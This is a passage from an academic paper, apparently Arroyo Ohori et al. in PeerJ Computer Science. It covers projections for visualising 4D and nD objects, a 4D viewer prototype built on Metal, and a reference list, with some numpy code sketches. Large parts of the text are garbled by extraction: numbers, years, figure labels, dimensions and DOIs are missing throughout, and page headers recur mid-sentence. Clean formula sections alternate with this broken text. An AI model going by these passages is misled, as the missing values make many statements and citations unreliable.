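    n = points.shape[1]
    diffs = (points[1:] - points[0]).T               # n x (n-1): columns are p_i - p_0
    normal = np.empty(n)
    for row in range(n):
        minor = np.delete(diffs, row, axis=0)        # drop the row of unit vector x_row
        normal[row] = (-1) ** (row + n - 1) * np.linalg.det(minor)
    return normal

# in 3d this reduces to the usual cross product of (p1 - p0) and (p2 - p0)
print(cross_product_nd([[0, 0, 0], [1, 0, 0], [0, 1, 0]]))   # -> [0. 0. 1.]
# one of the six 4d rotation planes: a quarter turn parallel to the xw plane
r_xw = rotation_matrix(4, 0, 3, np.pi / 2)
```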
other books that treat the topic intuitively include beyond the third dimension: geometry, computer graphics, and higher dimensions (banchoff, ) and the visual guide to extra dimensions: visualizing the fourth dimension, higher-dimensional polytopes, and curved hypersurfaces (mcmullen, ). in a more concrete computer graphics context, already in the s, noll ( ) described a computer implementations of the d to d perspective projection and its application in art (noll, ). beshers & feiner ( ) describe a system that displays animating (i.e. continuously transformed) d objects that are rendered in real-time and use colour intensity to provide a visual cue for the d depth. it is extended to n dimensions by feiner & beshers ( ). banks ( ) describes a system that manipulates surfaces in d space. it describes interaction techniques and methods to deal with intersections, transparency and the silhouettes of every surface. hanson & cross ( ) describes a high-speed method to render surfaces in d space with shading using a d light and occlusion, while hanson ( ) describes much of the mathematics that are necessary for nd visualisation. a more practical implementation is described in hanson, ishkov & ma ( ). chu et al. ( ) describe a system to visualise -manifolds and -manifolds embedded in d space and illuminated by d light sources. notably, it uses a custom rendering pipeline that projects tetrahedra in d to volumetric images in d—analogous to how triangles in d that are usually projected to d images. a different possible approach lies in using meaningful d cross-sections of a d dataset. for instance, kageyama ( ) describes how to visualise d objects as a set of hyperplane slices. bhaniramka, wenger & crawfis ( ) describe how to compute isosurfaces in dimensions higher than three using an algorithm similar to marching cubes. d’zmura, colantoni & seyranian ( ) describe a system that displays d cross-sections of a d virtual world one at a time. similar to the methods described above, hollasch ( ) gives a simple formulation to describe the d to d projections, which is itself based on the d to d orthographic and perspective projection methods described by foley & nielson ( ). this is the method that we extend to define n-dimensional versions of these projections and is thus explained in greater detail below. the mathematical notation is however changed slightly so as to have a cleaner extension to higher dimensions. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in order to apply the required transformations, hollasch ( ) first defines a point from∈r where the viewer (or camera) is located, a point to∈r that the viewer directly points towards, and a set of two vectors −→ up and−−→over. based on these variables, he defines a set of four unit vectors â, b̂, ĉ and d̂ that define the axes of a d coordinate system centred at the from point. these are ensured to be orthogonal by using the d cross-product to compute them, such that: d̂ = to−from ‖to−from‖ â= up×over×d̂ ‖up×over×d̂‖ b̂= over×d̂×â ‖over×d̂×â‖ ĉ = d̂×â×b̂. note two aspects in the equations above: (i) that the input vectors −→ up and −−→over are left unchanged (i.e., b̂= −→ up and ĉ =−−→over) if they are already orthogonal to each other and orthogonal to the vector from from to to (i.e., to−from), and (ii) that the last vector ĉ does not need to be normalised since the cross-product already returns a unit vector. 
these new unit vectors can then be used to define a transformation matrix to transform the 4d coordinates into a new set of points E (as in eye coordinates) with a coordinate system with the viewer at its centre and oriented according to the unit vectors. the points are given by:

\[
E = \begin{bmatrix} P - from \end{bmatrix} \begin{bmatrix} \hat{a} & \hat{b} & \hat{c} & \hat{d} \end{bmatrix}.
\]

for an orthographic projection, given $E = [e_0\ e_1\ e_2\ e_3]$, the first three columns $e_0$, $e_1$ and $e_2$ can be used as-is, while the fourth column $e_3$ defines the orthogonal distance to the viewer (i.e., the depth). finally, in order to obtain a perspective projection, he scales the points inwards in direct proportion to their depth. starting from E, he computes $E' = [e'_0\ e'_1\ e'_2\ e'_3]$ as:

\[
e'_0 = \frac{e_0}{e_3 \tan \vartheta/2}
\qquad
e'_1 = \frac{e_1}{e_3 \tan \vartheta/2}
\qquad
e'_2 = \frac{e_2}{e_3 \tan \vartheta/2}
\qquad
e'_3 = e_3,
\]

where $\vartheta$ is the viewing angle between x and the line between the from point and every point as shown in fig. . a similar computation is done for y and z. in $E'$, the first three columns (i.e., $e'_0$, $e'_1$ and $e'_2$) similarly give the 3d coordinates for a perspective projection of the 4d points while the fourth column is also the depth of the point.

figure: the geometry of a 4d perspective projection along the x axis for a point p. by analysing the depth along the depth axis given by $e_3$, it is possible to see that the coordinates of the point along the x axis, given by $e_0$, are scaled inwards in order to obtain $e'_0$ based on the viewing angle $\vartheta$. note that $\hat{x}_{n-1}$ is an arbitrary viewing hyperplane and another value can be used just as well.
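as an illustration of the whole 4d-to-3d scheme, a self-contained numpy sketch could look as follows; it is our own reading of the formulation above, not the paper's prototype code, and the sign convention of the 4d cross-product (and therefore the handedness of the resulting basis) may differ from hollasch's:

```python
import numpy as np

def normalise(v):
    return v / np.linalg.norm(v)

def cross_4d(u, v, w):
    """4d cross product: a vector orthogonal to u, v and w (cofactor expansion)."""
    m = np.column_stack([u, v, w])
    return np.array([(-1) ** (i + 3) * np.linalg.det(np.delete(m, i, axis=0))
                     for i in range(4)])

def project_4d_to_3d(points, frm, to, up, over, angle):
    """perspective projection of 4d points to 3d following the scheme above."""
    d = normalise(to - frm)
    a = normalise(cross_4d(up, over, d))
    b = normalise(cross_4d(over, d, a))
    c = cross_4d(d, a, b)                                   # unit length by construction
    eye = (points - frm) @ np.column_stack([a, b, c, d])    # eye coordinates
    depth = eye[:, 3]
    return eye[:, :3] / (depth[:, None] * np.tan(angle / 2.0)), depth

# hypothetical example: viewer on the w axis looking at the origin
pts = np.array([[1.0, 1.0, 1.0, 1.0], [-1.0, 1.0, 0.0, 2.0]])
proj, depth = project_4d_to_3d(pts, frm=np.array([0.0, 0.0, 0.0, 5.0]), to=np.zeros(4),
                               up=np.array([0.0, 1.0, 0.0, 0.0]),
                               over=np.array([0.0, 0.0, 1.0, 0.0]), angle=np.pi / 4)
```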
in banchoff & cervone ( ), figs. – in arenas & pérez-aguila ( ), fig. in grasset-simon, damiand & lienhardt ( ), fig. in paul ( ) and fig. in van oosterom & meijers ( ). conceptually, describing this projection from n to n− dimensions, which we hereafter refer to as a ‘long axis’ projection, is very simple. considering a set of points p in rn, the projected set of points p′ in rn− is given by taking the coordinates of p for the arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (b) (c) figure a model of a d house similar to the example shown previously in fig. , here including also a window and a door that are collapsed to a vertex in the d object at the lower level of detail. (a) shows the two d objects positioned as in fig. , (b) rotates these models ◦ so that the front of the house is on the right, and (c) orients the two d objects front to back. many more interesting views are possible, but these show the correspondences particularly clearly. unlike the other model, this one was generated with d coordinates and projected using our prototype that applies the projection described in this sec- tion. (a) (b) figure we take (a) a simple d model of two buildings connected by an elevated corridor, and model it in d such that the two buildings exist during a time interval [− , ]and the corridor only exists during [− . , . ], resulting in (b) a d model shown here in a ‘long axis’ projection. the two buildings are shown in blue and green for clarity. note how this model shows more saturated colours due to the higher number of faces that overlap in it. figure the typical explanation for how to draw the vertices and edges in an i-cube. starting from a single vertex representing a point (i.e. a -cube), an (i+ )-cube can be created by drawing two i-cubes and connecting the corresponding vertices of the two. image by wikimedia user nerdboy (retrieved from https://commons.wikimedia.org/wiki/file:dimension_levels.svg under a cc by-sa . license). arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://commons.wikimedia.org/wiki/file:dimension_levels.svg http://dx.doi.org/ . /peerj-cs. (d) (e) (f) (a) (b) (c) figure (a–c) the d house model and (d–f) the two buildings model projected down to d using an orthographic projection. the different views are obtained by applying different rotations in d. the less and more detailed d models can be found by looking at where the door and window are collapsed. first n− axes and adding to them the last coordinate of p which is spread over all coordinates according to weights specified in a customisable vector x̂n. for instance, fig. uses x̂n =[ ], resulting in d models that are units displaced for every unit in which they are apart along the n-th axis. in matrix form, this kind of projection can then be applied as p′=p[i x̂n]. orthographic and perspective projections another reasonably intuitive pair of projections are the orthographic and perspective projections from nd to (n− )d. these treat all axes similarly and thus make it more difficult to see the different (n− )-dimensional models along the n-th axis, but they result in models that are much less deformed. also, as shown in the d example in fig. , it is easy to rotate models in such a way that the corresponding features are easily seen. 
orthographic and perspective projections
another reasonably intuitive pair of projections are the orthographic and perspective projections from nd to (n-1)d. these treat all axes similarly and thus make it more difficult to see the different (n-1)-dimensional models along the n-th axis, but they result in models that are much less deformed. also, as shown in the 4d example in fig. , it is easy to rotate models in such a way that the corresponding features are easily seen.

based on the description of the 4d-to-3d orthographic and perspective projections from hollasch ( ), we here extend the method in order to describe the n-dimensional to (n-1)-dimensional case, changing some aspects to give a clearer geometric meaning for each vector. similarly, we start with a point $from \in \mathbb{R}^n$ where the viewer is located, a point $to \in \mathbb{R}^n$ that the viewer directly points towards (which can be easily set to the centre or centroid of the dataset), and a set of n-2 initial vectors $\vec{v}_1, \ldots, \vec{v}_{n-2}$ in R^n that are not all necessarily orthogonal but nevertheless are linearly independent from each other and from the vector to - from. in this setup, the $\vec{v}_i$ vectors serve as a base to define the orientation of the system, much like the traditional $\overrightarrow{up}$ vector that is used in 3d to 2d projections and the $\overrightarrow{over}$ vector described previously.

from the above mentioned variables and using the nd cross-product, it is possible to define a new set of orthogonal unit vectors $\hat{x}_0, \ldots, \hat{x}_{n-1}$ that define the axes $x_0, \ldots, x_{n-1}$ of a coordinate system in R^n as:

\[
\hat{x}_{n-1} = \frac{to - from}{\|to - from\|}
\qquad
\hat{x}_0 = \frac{\vec{v}_1 \times \cdots \times \vec{v}_{n-2} \times \hat{x}_{n-1}}{\|\vec{v}_1 \times \cdots \times \vec{v}_{n-2} \times \hat{x}_{n-1}\|}
\]
\[
\hat{x}_i = \frac{\vec{v}_{i+1} \times \cdots \times \vec{v}_{n-2} \times \hat{x}_{n-1} \times \hat{x}_0 \times \cdots \times \hat{x}_{i-1}}{\|\vec{v}_{i+1} \times \cdots \times \vec{v}_{n-2} \times \hat{x}_{n-1} \times \hat{x}_0 \times \cdots \times \hat{x}_{i-1}\|}
\qquad
\hat{x}_{n-2} = \hat{x}_{n-1} \times \hat{x}_0 \times \cdots \times \hat{x}_{n-3}.
\]

the vector $\hat{x}_{n-1}$ is the first that needs to be computed and is oriented along the line from the viewer (from) to the point that it is oriented towards (to). afterwards, the vectors are computed in order from $\hat{x}_0$ to $\hat{x}_{n-2}$ as normalised n-dimensional cross products of n-1 vectors. these contain a mixture of the input vectors $\vec{v}_1, \ldots, \vec{v}_{n-2}$ and the computed unit vectors, starting from n-2 input vectors and one unit vector for $\hat{x}_0$, and removing one input vector and adding the previously computed unit vector for the next $\hat{x}_i$ vector. note that if $\vec{v}_1, \ldots, \vec{v}_{n-2}$ and $\hat{x}_{n-1}$ are all orthogonal to each other, $\forall\, 0 < i < n-1$, $\hat{x}_i$ is simply a normalised $\vec{v}_i$.

like in the previous case, the vectors $\hat{x}_0, \ldots, \hat{x}_{n-1}$ can then be used to transform an m x n matrix of m nd points in world coordinates P into an m x n matrix of m nd points in eye coordinates E by applying the following transformation:

\[
E = \begin{bmatrix} P - from \end{bmatrix} \begin{bmatrix} \hat{x}_0 & \cdots & \hat{x}_{n-1} \end{bmatrix}.
\]

as before, if E has rows of the form $[e_0 \cdots e_{n-1}]$ representing points, $e_0, \ldots, e_{n-2}$ are directly usable as the coordinates in R^(n-1) of the projected point in an n-dimensional to (n-1)-dimensional orthographic projection, while $e_{n-1}$ represents the depth, i.e. the distance between the point and the projection (n-1)-dimensional subspace, which can be used for visual cues (visual cues can still be useful in higher dimensions; see http://eusebeia.dyndns.org/ d/vis/ -hsr). the coordinates along $e_0, \ldots, e_{n-2}$ could be made to fit within a certain bounding box by computing their extent along each axis, then scaling appropriately using the extent that is largest in proportion to the extent of the bounding box's corresponding axis.

for an n-dimensional to (n-1)-dimensional perspective projection, it is only necessary to compute the distance between a point and the viewer along every axis by taking into account the viewing angle $\vartheta$ between $\hat{x}_{n-1}$ and the line between the to point and every point. intuitively, this means that if an object is n times farther than another identical object, it is depicted n times smaller, or 1/n of its size. this situation is shown in fig. and results in new $e'_0, \ldots, e'_{n-2}$ coordinates that are shifted inwards. the coordinates are computed as:

\[
e'_i = \frac{e_i}{e_{n-1} \tan \vartheta/2}, \quad \text{for } 0 \le i \le n-2.
\]

figure: the geometry of an nd perspective projection for a point p. by analysing each axis $\hat{x}_i$ ($\forall\, 0 \le i < n-1$) independently together with the final axis $\hat{x}_{n-1}$, it is possible to see that the coordinates of the point along that axis, given by $e_i$, are scaled inwards based on the viewing angle $\vartheta$.

the (n-1)-dimensional coordinates generated by this process can then be recursively projected down to progressively lower dimensions using this method. the objects represented by these coordinates can also be discretised into images of any dimension. for instance, hanson ( ) describes how to perform many of the operations that would be required, such as dimension-independent clipping tests and ray-tracing methods.
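the construction generalises readily to any dimension; the following numpy sketch is our own dimension-independent reading of it (again, individual axes may come out mirrored depending on the sign convention of the generalised cross-product):

```python
import numpy as np

def cross_nd(vectors):
    """vector orthogonal to the n-1 given vectors in R^n (cofactors of the last column)."""
    m = np.column_stack(vectors)                     # n x (n-1)
    n = m.shape[0]
    return np.array([(-1) ** (i + n - 1) * np.linalg.det(np.delete(m, i, axis=0))
                     for i in range(n)])

def view_basis(frm, to, aux):
    """orthonormal axes x_0 ... x_{n-1}; aux is the list of n-2 orientation vectors v_i."""
    n = len(frm)
    axes = [None] * n
    axes[n - 1] = (to - frm) / np.linalg.norm(to - frm)
    for i in range(n - 1):
        v = cross_nd(list(aux[i:]) + [axes[n - 1]] + axes[:i])
        axes[i] = v / np.linalg.norm(v)
    return np.column_stack(axes)

def project_nd(points, frm, to, aux, angle=None):
    """orthographic (angle=None) or perspective projection from R^n to R^(n-1)."""
    eye = (points - frm) @ view_basis(frm, to, aux)
    depth = eye[:, -1]
    low = eye[:, :-1]
    if angle is not None:                            # perspective: scale inwards by depth
        low = low / (depth[:, None] * np.tan(angle / 2.0))
    return low, depth

# hypothetical 4d example: the two aux vectors play the roles of up and over
pts = np.array([[1.0, 1.0, 1.0, 1.0], [0.5, -1.0, 2.0, 0.0]])
aux = [np.array([0.0, 1.0, 0.0, 0.0]), np.array([0.0, 0.0, 1.0, 0.0])]
low, depth = project_nd(pts, np.array([0.0, 0.0, 0.0, 5.0]), np.zeros(4), aux, angle=np.pi / 4)
```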
stereographic projection
a final projection possibility is to apply a stereographic projection from R^n to R^(n-1), which for us was partly inspired by jenn 3d (http://www.math.cmu.edu/~fho/jenn/) (fig. ). this program visualises polyhedra and polychora embedded in R^4 by first projecting them inwards/outwards to the volume of a 3-sphere (intuitively, an unbounded volume that wraps around itself, much like a 2-sphere can be seen as an unbounded surface that wraps around itself) and then projecting them stereographically to R^3, resulting in curved edges, faces and volumes.

figure: a polyhedron and a polychoron in jenn 3d: (a) a cube and (b) a -cell.

in a dimension-independent form, this type of projection can be easily done by considering the angles $\vartheta_0, \ldots, \vartheta_{n-2}$ in an n-dimensional spherical coordinate system. steeb ( ) formulates such a system as:

\[
r = \sqrt{x_0^2 + \cdots + x_{n-1}^2}
\qquad
\vartheta_i = \cos^{-1}\!\left(\frac{x_i}{\sqrt{r^2 - \sum_{j=0}^{i-1} x_j^2}}\right), \ \text{for } 0 \le i < n-2
\qquad
\vartheta_{n-2} = \tan^{-1}\!\left(\frac{x_{n-1}}{x_{n-2}}\right).
\]

it is worth noting that the radius r of such a coordinate system is a measure of the depth with respect to the projection (n-1)-sphere $S^{n-1}$ and can be used similarly to the previous projection examples. the points can then be converted back into points on the surface of an (n-1)-sphere of radius 1 by making r = 1 and applying the inverse transformation. steeb ( ) formulates it as:

\[
x_i = r \cos\vartheta_i \prod_{j=0}^{i-1} \sin\vartheta_j, \ \text{for } 0 \le i < n-1
\qquad
x_{n-1} = r \prod_{j=0}^{n-2} \sin\vartheta_j.
\]

the next step, a stereographic projection, is also easy to apply in higher dimensions, mapping an (n+1)-dimensional point $x = (x_0, \ldots, x_n)$ on an n-sphere $S^n$ to an n-dimensional point $x' = (x_0, \ldots, x_{n-1})$ in the n-dimensional euclidean space R^n. chisholm ( ) formulates this projection as:

\[
x'_i = \frac{x_i}{x_n - 1}, \quad \text{for } 0 \le i < n.
\]

the stereographic projection from nd to (n-1)d is particularly intuitive because it results in the n-th axis being converted into an inwards-outwards axis. as shown in fig. , when it is applied to scale, this results in models that decrease or increase in detail as one moves inwards or outwards. the case with time is similar: as one moves inwards/outwards, it is easy to see the state of a model at a time before/after.
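a compact numpy sketch of the two steps (normalising onto the unit (n-1)-sphere and then projecting stereographically), following the pole convention of the formula above; the names are ours:

```python
import numpy as np

def stereographic_projection(points):
    """project n-d points onto the unit (n-1)-sphere (inwards/outwards along the radius)
    and then stereographically to R^(n-1), using the pole (0, ..., 0, 1)."""
    points = np.asarray(points, dtype=float)
    radius = np.linalg.norm(points, axis=1)          # depth with respect to S^(n-1)
    on_sphere = points / radius[:, None]             # equivalent to setting r = 1
    return on_sphere[:, :-1] / (on_sphere[:, -1:] - 1.0), radius

# hypothetical 4d example (points at the origin or at the pole itself would divide by zero)
pts = np.array([[0.0, 0.0, 0.0, -2.0],
                [3.0, 0.0, 0.0,  0.0]])
low, depth = stereographic_projection(pts)
print(low)      # -> [[ 0.  0.  0.]
                #     [-1.  0.  0.]]
print(depth)    # -> [2. 3.]
```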
results
we have implemented a small prototype for an interactive viewer of arbitrary 4d objects that performs the three projections previously described. it was used to generate the figures in this section, which were obtained by moving around the scene, zooming in/out and capturing screenshots using the software. the prototype was implemented using part of the codebase of azul (https://github.com/tudelft3d/azul) and is written in a combination of swift and c++ using metal, a low-level and low-overhead graphics api, under macos (https://developer.apple.com/metal/). by using metal, we are able to project and display objects with several thousand polygons with minimal visual lag on a standard computer. its source code is available under the gpl licence at https://github.com/kenohori/azul4d.

figure: (a) the 4d house model and (b) the two buildings model projected first inwards/outwards to the closest point on the 3-sphere $S^3$ and then stereographically to R^3. the round surfaces are obtained by first refining every face in the 4d models.

we take advantage of the fact that the metal shading language, as well as most other linear algebra libraries intended for computer graphics, has appropriate data structures for 3d geometries and linear algebra operations with vectors and matrices of size up to four. while these are normally intended for use with homogeneous coordinates in 3d space, they can be used to do various operations in 4d space with minor modifications and by reimplementing some operations. unfortunately, this programming trick also means that extending the current prototype to dimensions higher than four requires additional work and rather cumbersome programming. however, implementing these operations in a dimension-independent way is not difficult in a more flexible programming environment. for instance, fig. shows how a double stereographic projection can be used to reduce the dimensionality of an object from 5d to 3d. this figure was generated in a separate c++ program which exports its results to an obj file. the models were afterwards rendered in blender (https://www.blender.org).

figure: (a) a stereographic projection of a 4d orthoplex and (b) a double stereographic projection of a 5d orthoplex. the family of orthoplexes contains the analogue shapes of a 2d square or a 3d octahedron.

in our prototype, we only consider the vertices, edges and faces of the 4d objects, as the higher-dimensional 3d and 4d primitives, whose 0d, 1d and 2d boundaries are however shown, would readily obscure each other in any sort of 2d or 3d visualisation (banks, ). every face of an object is thus stored as a sequence of vertices with coordinates in R^4 and is appended with an rgba colour attribute with possible transparency. the alpha value of each face is used to see all faces at once, as they would otherwise overlap with each other on the screen.

the 4d models were manually constructed based on defining their vertices with 4d coordinates and their faces as successions of vertices.
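as a rough cpu-side illustration of how such a manually constructed model can be pushed through one of the projections and then through a final 3d-to-2d perspective for display (this is not the actual metal shader code; all names and values are ours):

```python
import numpy as np

def perspective_3d_to_2d(points, eye_z=5.0, angle=np.pi / 3):
    """simplified stand-in for the final 3d-to-2d display projection."""
    depth = eye_z - points[:, 2]
    return points[:, :2] / (depth[:, None] * np.tan(angle / 2.0))

def render_model(faces_4d, project_4d_to_3d):
    """project every face of a 4d model (a list of k x 4 vertex arrays) to screen space;
    project_4d_to_3d can be any of the three R^4 -> R^3 projections sketched earlier."""
    screen_faces = []
    for face in faces_4d:
        face_3d = project_4d_to_3d(np.asarray(face, dtype=float))
        screen_faces.append(perspective_3d_to_2d(face_3d))
    return screen_faces

# hypothetical model: two triangles that only differ in their fourth coordinate,
# projected with a 'long axis' matrix that spreads the fourth axis over x
spread = np.vstack([np.eye(3), [2.0, 0.0, 0.0]])
faces = [[[0, 0, 0, 0], [1, 0, 0, 0], [1, 1, 0, 0]],
         [[0, 0, 0, 1], [1, 0, 0, 1], [1, 1, 0, 1]]]
screen = render_model(faces, lambda pts: pts @ spread)
```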
in addition to the 4d house previously shown, we built a simpler tesseract for testing. as built, the tesseract consists of vertices and faces, while the 4d house consists of vertices and faces. however, we used the face refining process described below to test our prototype with models with up to a few thousand faces. once created, the models were still displayed and manipulated smoothly.

to start, we preprocess a 4d model by triangulating and possibly refining each face, which makes it possible to display concave faces and to properly see the curved shapes that are caused by the stereographic projection previously described. for this, we first compute the plane passing through the first three points of each face and project each point from R^4 to a new coordinate system in R^2 on the plane (this is sufficient for our purposes, but other applications would need to find three linearly-independent points or to use a more computationally expensive method that finds the best fitting plane for the face). we then triangulate and refine separately each face in R^2 with the help of a few packages of the computational geometry algorithms library (cgal) (http://www.cgal.org), and then we reproject the results back to the previously computed plane in R^4.

we then use a metal shading language compute shader, a technique to perform general-purpose computing on graphics processing units (gpgpu), in order to apply the desired projection from R^4 to R^3. the three different projections presented previously are each implemented as a compute shader. by doing so, it is easier to run them as separate computations outside the graphics pipeline, to then extract the projected R^3 vertex coordinates of every face and use them to generate separate representations of their bounding edges and vertices (an alternative would be to embed these in 3d from the beginning, but it would result in distorted shapes depending on their position and orientation due to the extra degrees of rotational freedom in R^4). using their projected coordinates in R^3, the edges and vertices surrounding each face are thus displayed respectively as possibly refined line segments and as icosahedral approximations of spheres (i.e., icospheres). finally, we use a standard perspective projection in a metal vertex shader to display the projected model with all its faces, edges and vertices.

we use a couple of tricks in order to keep the process fast and as parallel as possible: separate threads for each cpu process (the generation of the vertex and edge geometries and the modification of the projection matrices according to user interaction) and gpu process (4d-to-3d projection and 3d-to-2d projection for display), and blending with order-independent transparency
they also have a dimension-independent formulation. there are however many other types of interesting projections that can be defined in any dimension, such as the equirectangular projection where evenly spaced angles along a rotation plane can be directly converted into evenly spaced coordinates—in this case covering ◦ vertically and ◦ horizontally. extending such a projection to nd would result in an n-orthotope, such as a (filled) rectangle in d or a cuboid (i.e., a box) in d. by applying the projections shown in this paper to d objects depicting d objects that change in time or scale, it is possible to see at once all correspondences between different elements of the d objects and the topological relationships between them. compared to other d visualisation techniques, we opt for a rather minimal approach without lighting and shading. in our application, we believe that this is optimal due to better performance and because it makes for simpler-looking and more intuitive output. in this manner, progressively darker shades of a colour are a good visual cue for the number of faces of the same colour that are visually overlapping at any given point. since we apply the projection from d to d in the gpu, it is not efficient to extract the surfaces again in order to compute the d normals required for lighting in d, while lighting in d results in unintuitive visual cues. additional information and declarations funding this research is supported by the dutch technology foundation stw, which is part of the netherlands organisation for scientific research (nwo), and which is partly funded by the ministry of economic affairs (project code: ). this project has received funding from the european research council (erc) under the european union’s horizon research and innovation programme (grant agreement no umnd). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: dutch technology foundation stw. netherlands organisation for scientific research (nwo). european union’s horizon research and innovation programme: umnd. ministry of economic affairs: . competing interests the authors declare there are no competing interests. author contributions • ken arroyo ohori conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • hugo ledoux and jantien stoter analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/kenohori/azul d. references abbott ea. . flatland: a romance of many dimensions. london: seely & co. abiteboul s, hull r. . update propagation in the ifo database model. in: ghosh sp, kambayashi y, tanaka k, eds. foundations of data organization. new york: springer us, – . arenas y, pérez-aguila r. . visualizing d projections of higher dimensional polytopes: an approach linking art and computers. in: memorias del cuarto congreso nacional de ciencias de la computacion. armstrong mp. . temporality in spatial databases. 
in: gis/lis’ : proceedings: accessing the world: third annual international conference, exhibits, and workshops. bethesda: american society for photogrammetry and remote sensing, – . arroyo ohori k. . higher-dimensional modelling of geographic information. phd thesis, delft university of technology. arroyo ohori k, boguslawski p, ledoux h. . representing the dual of objects in a four-dimensional gis. in: abdul rahman a, boguslawski p, gold c, said m, eds. developments in multidimensional spatial data models. lecture notes in geoinformation and cartography, berlin, heidelberg: springer, – . arroyo ohori k, damiand g, ledoux h. . constructing an n-dimensional cell complex from a soup of (n- )-dimensional faces. in: gupta p, zaroliagis c, eds. applied algorithms. first international conference, icaa , kolkata, india, january – , . proceedings. lecture notes in computer science, vol. . kolkata: springer international publishing switzerland, – . arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/kenohori/azul d http://dx.doi.org/ . /peerj-cs. arroyo ohori k, ledoux h, biljecki f, stoter j. a. modelling a d city model and its levels of detail as a true d model. isprs international journal of geo-information ( ): – doi . /ijgi . arroyo ohori k, ledoux h, stoter j. b. an evaluation and classification of nd topological data structures for the representation of objects in a higher-dimensional gis. international journal of geographical information science ( ): – doi . / . . . arroyo ohori k, ledoux h, stoter j. c. storing a d city model, its levels of detail and the correspondences between objects as a d combinatorial map. in: rahman aa, isikdag u, castro fa, eds. joint international geoinformation conference , – october , kuala lumpur, malaysia. isprs annals of the photogrammetry, remote sensing and spatial information sciences, vol. ii– /w . kuala lumpur: isprs, – . arroyo ohori k, ledoux h, stoter j. . modelling and manipulating spacetime objects in a true d model. journal of spatial information science : – . ballard dh. . strip trees: a hierarchical representation for curves. communications of the acm ( ): – doi . / . . banchoff t, cervone dp. . illustrating beyond the third dimension. leonardo ( – ): – doi . / . banchoff tf. . beyond the third dimension: geometry, computer graphics, and higher dimensions. new york: scientific american library series. banks d. . interactive manipulation and display of surfaces in four dimensions. in: i d’ proceedings of the symposium on interactive d graphics. acm, – . beshers cm, feiner sk. . real-time d animation on a d graphics workstation. in: graphics interface’ . edmonton: chccs/scdhm, – . bhaniramka p, wenger r, crawfis r. . isosurfacing in higher dimensions. in: vis’ proceedings of the conference on visualization’ . piscataway: ieee. bieri h, nef w. . elementary set operations with d-dimensional polyhedra. in: noltemeier h, ed. computational geometry and its applications. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . brisson e. . representing geometric structures in d dimensions: topology and order. discrete & computational geometry : – doi . /bf . buttenfield bp, delotto js. . multiple representations: scientific report for the specialist meeting. technical report – . santa barbara: national center for geographic information and analysis. chisholm m. . the sphere in three dimensions and higher: generalizations and special cases. 
available at https://theory.org/geotopo/ -sphere/ -sphere.ps. chrisman nr. . the role of quality information in the long-term functioning of a geographic information system. cartographica. chu a, fu c-w, hanson aj, heng p-a. . gl d: a gpu-based architecture for interactive d visualization. in: ieee transactions on visualization and computer graphics. d . piscataway: ieee, – . arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijgi http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /bf https://theory.org/geotopo/ -sphere/ -sphere.ps http://dx.doi.org/ . /peerj-cs. Čomić l, de floriani l. . modeling and manipulating cell complexes in two, three and higher dimensions. lecture notes in computational vision and biomechanics, vol. dordrecht: springer, – , chapter . descartes r. . discours de la méthode. leyde: jan maire. d’zmura m, colantoni p, seyranian g. . virtual environments with four or more spatial dimensions. presence ( ): – doi . / . elduque a. . vector cross products. talk presented at the seminario rubio de francia of the universidad de zaragoza on april , . available at http://www. unizar.es/matematicas/algebra/elduque/talks/crossproducts.pdf . feiner s, beshers c. . visualizing n-dimensional virtual worlds with n-vision. in: proceedings of the symposium on interactive d graphics. acm, – . filho wc, de figueiredo lh, gattass m, carvalho pc. . a topological data struc- ture for hierarchical planar subdivisions. technical report cs- - . department of computer science, university of waterloo. foley jd, van dam a, feiner sk, hughes jf. . computer graphics: principles and practice in c. boston: addison-wesley professional. foley ta, nielson gm. . practical techniques for producing d graphical images. in: black j, ed. the system engineer’s handbook: a guide to building vmebus and vxibus systems. san diego: academic press, – , chapter . frank au. . four-dimensional representation in human cognition and difficulties with demonstrations: a commentary on wang. spatial cognition & computation : – doi . / . . . friis-christensen a, jensen cs. . object-relational management of multiply represented geographic entities. in: proceedings of the th international conference on scientific and statistical database management. piscataway: ieee computer society, – . grafarend ew, you r-j. . map projections: cartographic information systems. berlin, heidelberg: springer-verlag. grasset-simon c, damiand g, lienhardt p. . nd generalized map pyramids: definition, representations and basic operations. pattern recognition ( ): – doi . /j.patcog. . . . gröger g, kolbe th, nagel c, häfele k-h. . ogc city geography markup lan- guage (citygml) encoding standard. version . . . open geospatial consortium. guibas lj, stolfi j. . primitives for the manipulation of general subdivisions and the computation of voronoi diagrams. acm transactions on graphics ( ): – doi . / . . günther o. . the arc tree: an approximation scheme to represent arbitrary curved shapes. in: efficient structures for geometric data management. lecture notes in computer science, vol. berlin, heidelberg: springer, – , chapter . güting rh, böhlen mh, erwig m, jensen cs, lorentzos na, schneider m, vazirgiannis m. . a foundation for representing and querying moving objects. acm transactions on database systems ( ): – doi . / . . arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . 
